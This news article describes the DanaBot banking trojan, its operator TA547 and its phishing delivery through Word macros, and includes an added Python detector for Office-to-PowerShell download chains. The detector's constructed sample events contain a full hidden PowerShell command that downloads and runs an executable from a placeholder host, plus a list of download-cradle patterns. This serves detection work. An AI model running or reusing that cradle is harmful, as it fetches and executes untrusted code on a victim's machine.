A new banking trojan called DanaBot has emerged that primarily targets users in Australia. The malware, which is written in Delphi and still under development, has so far been observed in use by only one threat actor, tracked as TA547.
This operator is known to have previously bought banking malware from other malware developers and operators. Active since November 2017, TA547 has distributed other malware families including Ursnif, Gootkit, Atmos, Panda Banker, Corebot and Mazar Bot, as well as the Red Alert Android malware. Countries previously targeted by this threat actor include the UK, Germany, Italy and Australia.
There is also evidence that the malware may have been distributed by other threat actors, since additional samples were found in malware repositories.
DanaBot is distributed via phishing emails containing malicious URLs that redirect the target to a Microsoft Word document hosted on another site. Once the user enables the document's content, it downloads the DanaBot malware using a PowerShell command. The document also carries copied security-vendor branding claiming that the file is protected by that vendor.
Delivery is geofenced: the target's geolocation is checked and DanaBot is served only to users in Australia. The malware comes with data-stealing and banking-site web injection capabilities. It collects detailed system information, files stored on disk and a screenshot of the user's desktop, all of which it sends to the C2 server.
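The delivery chain described above (a Word document whose enabled content launches PowerShell to fetch the payload) is the part of this campaign a defender can most readily detect on the endpoint. The following is an added example, not code from Proofpoint or from the DanaBot samples, that scores process-creation events for an Office application spawning a scripting host with download-cradle markers in its command line. The events are constructed Sysmon-style records, the URL and file names in them are placeholders, and the marker list and score thresholds are assumptions of this example, not indicators published for DanaBot.

```python
"""Detect the Office -> PowerShell download chain over process-creation events.

Input events mimic Sysmon Event ID 1 fields (parent image, image, command line).
All sample data below is constructed for this example; nothing is real telemetry.
"""
import re
from dataclasses import dataclass

# Parent applications that should rarely spawn a scripting host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Child images commonly launched by malicious macros.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Download-cradle and evasion markers (assumed list, extend to taste).
CRADLE_PATTERNS = [
    r"downloadfile", r"downloadstring", r"invoke-webrequest", r"\biwr\b",
    r"net\.webclient", r"start-bitstransfer", r"invoke-expression", r"\biex\b",
    r"-enc(odedcommand)?\b", r"-w(indowstyle)?\s+hidden", r"https?://",
]
CRADLE_RE = re.compile("|".join(CRADLE_PATTERNS), re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). An Office parent spawning a shell scores 50 on
    its own; cradle markers in the child's command line add another 50."""
    reasons: list[str] = []
    score = 0
    if _basename(ev.parent_image) in OFFICE_PARENTS and _basename(ev.image) in SHELLS:
        score += 50
        reasons.append(f"office parent {_basename(ev.parent_image)} spawned {_basename(ev.image)}")
        hits = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(ev.command_line)})
        if hits:
            score += 50
            reasons.append("download/evasion markers: " + ", ".join(hits))
    return score, reasons


def detect(events: list[ProcessEvent]) -> list[tuple[int, ProcessEvent, list[str]]]:
    """Return events scoring >= 50 together with their reasons, highest first."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= 50:
            flagged.append((score, ev, reasons))
    flagged.sort(key=lambda t: -t[0])
    return flagged


# Constructed sample events: one macro-style cradle, one benign admin script,
# one Office->cmd launch without download markers.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -nop -c \"(New-Object Net.WebClient)"
                 ".DownloadFile('http://example.invalid/doc.exe',$env:TEMP+'\\d.exe');"
                 "Start-Process $env:TEMP'\\d.exe'\""),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -File C:\\scripts\\backup.ps1"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c echo hello"),
]

if __name__ == "__main__":
    for score, ev, reasons in detect(SAMPLE_EVENTS):
        print(score, _basename(ev.image), "|", "; ".join(reasons))
```

Run stand-alone, the script flags the Word-launched cradle at 100 and the Excel-launched cmd.exe at 50, and ignores the explorer-launched script. The two-tier score keeps the parent/child relationship as the primary signal, since attackers can obfuscate or encode the command line far more easily than they can change which process launched the shell.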
“Currently, the malware is in active development and there appear to be two versions. We observed the first in a campaign around May 6 and 7 while the second appeared around May 29. However, we found even earlier samples via pivots in malware repositories that date from the middle of April but we have not seen these in the wild,” Proofpoint researchers, who discovered DanaBot, said in a blog post.
DanaBot currently collects data from several popular email clients, including Outlook and Windows Live Mail, and from instant messengers such as Trillian, Digsby and Miranda.
“After nearly two years of relentless, high-volume ransomware campaigns, threat actors appear to be favoring less noisy malware such as banking Trojans and information stealers,” Proofpoint researchers said. “The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on ‘quality over quantity’ in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.”